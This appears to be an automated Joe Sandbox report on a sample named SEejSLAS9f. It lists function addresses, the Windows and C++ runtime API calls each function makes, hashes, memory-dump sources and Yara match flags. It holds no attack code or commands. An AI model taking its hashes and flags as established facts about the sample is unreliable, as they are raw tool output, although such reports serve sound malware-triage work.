                                                              • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                              • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                              • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                              APIs
                                                                • Part of subcall function 02482959: TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F
                                                              • TlsAlloc.KERNEL32(?,02480DA0), ref: 02493BE6
                                                              • GetLastError.KERNEL32 ref: 02493BF8
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02493C0E
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02493C1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                              • String ID:
                                                              • API String ID: 3735082963-0
                                                              • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                              • Instruction ID: c75cf1be0ba8b0ebd8faa3945242bf4a786f4bab695e1ced4cc2fe62c022bf4c
                                                              • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                              • Instruction Fuzzy Hash: 47E06834500202AFCB00FF779C49A7F3E686A023017100E6BE525D21A1EF34D0068EAC
                                                              APIs
                                                              • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                              • String ID:
                                                              • API String ID: 3016159387-0
                                                              • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                              • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                              • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                              • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                              APIs
                                                              • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02480DA0,?,?,?,00000000), ref: 0248279E
                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 024827AD
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024827C3
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024827D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                              • String ID:
                                                              • API String ID: 3016159387-0
                                                              • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                              • Instruction ID: 3a004793667cdad15ed708c278e2eb265b6b293adbb13b2d4906a12d889341ec
                                                              • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                              • Instruction Fuzzy Hash: B0E08074510149A7CB00FBB6DD45EAF77BC6A00B05B600566A541E3190EB64D7048B79
                                                              APIs
                                                              • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                              • GetLastError.KERNEL32 ref: 0041269D
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                              • String ID:
                                                              • API String ID: 4286982218-0
                                                              • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                              • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                              • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                              • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                              APIs
                                                              • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                              • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                              • String ID:
                                                              • API String ID: 1964976909-0
                                                              • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                              • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                              • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                              • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                              APIs
                                                              • SetThreadPriority.KERNEL32(?,?), ref: 024828F8
                                                              • GetLastError.KERNEL32 ref: 02482904
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0248291A
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02482928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                              • String ID:
                                                              • API String ID: 4286982218-0
                                                              • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                              • Instruction ID: 6bdd722bb6f6267576dccc9c198659edf368ef9c4099716b17cf10c88709ef7f
                                                              • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                              • Instruction Fuzzy Hash: 19E086346101096BCB14FF76CC05BBF376C6B00745B500926BC55D20A0EF79D1048AAC
                                                              APIs
                                                              • TlsSetValue.KERNEL32(?,00000000,02487BD8,00000000,?,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829BE
                                                              • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024829CA
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024829E0
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024829EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                              • String ID:
                                                              • API String ID: 1964976909-0
                                                              • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                              • Instruction ID: 777ef01c951a7e125f9b0e7ec1c04890caf91ed541871510d7ac9227cbf2b22f
                                                              • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                              • Instruction Fuzzy Hash: 04E086352101096BDB10FF75CC08BBF376C6F00745B500926BD59D10A0EF75D1149AAC
                                                              APIs
                                                              • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                              • GetLastError.KERNEL32 ref: 00412705
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                              • String ID:
                                                              • API String ID: 3103352999-0
                                                              • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                              • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                              • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                              • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                              APIs
                                                              • TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F
                                                              • GetLastError.KERNEL32 ref: 0248296C
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482982
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02482990
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                              • String ID:
                                                              • API String ID: 3103352999-0
                                                              • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                              • Instruction ID: e6ae053326569088123ac172e3d09ea79bb09a4af3f6f20b39d29d3f18cb0259
                                                              • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                              • Instruction Fuzzy Hash: 4FE02B301101456BC714FBBD9C4CB7F32AC6B01715BA00F2BF861E20E0EFA8D1084AAC
                                                              APIs
                                                              • Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C
                                                                • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
                                                                • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
                                                                • Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176
                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8
                                                                • Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7
                                                              • Concurrency::Context::Block.LIBCONCRT ref: 00411EAD
                                                                • Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63
                                                              • Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD
                                                                • Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
                                                                • Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
                                                                • Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                              • String ID:
                                                              • API String ID: 3659872527-0
                                                              • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                              • Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
                                                              • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                              • Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88
                                                              APIs
                                                              • Concurrency::critical_section::unlock.LIBCMT ref: 02482103
                                                                • Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0248139A
                                                                • Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024813D1
                                                                • Part of subcall function 02481379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024813DD
                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0248210F
                                                                • Part of subcall function 02480CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02480D0E
                                                              • Concurrency::Context::Block.LIBCONCRT ref: 02482114
                                                                • Part of subcall function 02482EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02482ECA
                                                              • Concurrency::critical_section::lock.LIBCONCRT ref: 02482134
                                                                • Part of subcall function 024812A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024812B0
                                                                • Part of subcall function 024812A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024812BD
                                                                • Part of subcall function 024812A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024812C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                              • String ID:
                                                              • API String ID: 3659872527-0
                                                              • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                              • Instruction ID: cac33b1527446063a4cc46baa9da76d26afef70897e8634251290038e0664877
                                                              • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                              • Instruction Fuzzy Hash: 5CE0DF359201069BCB08FF22C5604ACBB62BF81310B14430FD46A472E0CF746E4ACF84
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                              • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                              • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                              • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                              • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                              • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                              • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024AB32B,?,00000050,?,?,?,?,?), ref: 024AB1AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                              • Instruction ID: d996299ac57833f46d975cbf63b7a7074f7d35f5bbe6985b5cbf979b0331125b
                                                              • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                              • Instruction Fuzzy Hash: DD21B372B00105A6EB268F649D61BA7739AEF74BDCF4A8126E909DB304F732D941C390
                                                              APIs
                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: EncodersGdipImage$Size
                                                              • String ID: image/png
                                                              • API String ID: 864223233-2966254431
                                                              • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                              • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                              • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                              • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                              APIs
                                                              • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: F(@
                                                              • API String ID: 1452528299-2698495834
                                                              • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                              • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                              • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                              • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                              APIs
                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ___std_exception_destroy
                                                              • String ID: F(@$ios_base::failbit set
                                                              • API String ID: 4194217158-1828034088
                                                              • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                              • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                              • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                              • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                              APIs
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                              • String ID: pContext
                                                              • API String ID: 1687795959-2046700901
                                                              • Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
                                                              • Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
                                                              • Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
                                                              • Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3886170330-2084237596
                                                              • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                              • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                              • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                              • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                              APIs
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID: F@
                                                              • API String ID: 2118720939-885931407
                                                              • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                              • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                              • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                              • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                              APIs
                                                              • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                              • String ID: zB$~B
                                                              • API String ID: 3275300208-395995950
                                                              • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                              • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                              • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                              • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                              APIs
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                              • String ID: pThreadProxy
                                                              • API String ID: 1687795959-3651400591
                                                              • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                              • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                              • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                              • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                              • GetLastError.KERNEL32 ref: 0042AF2E
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
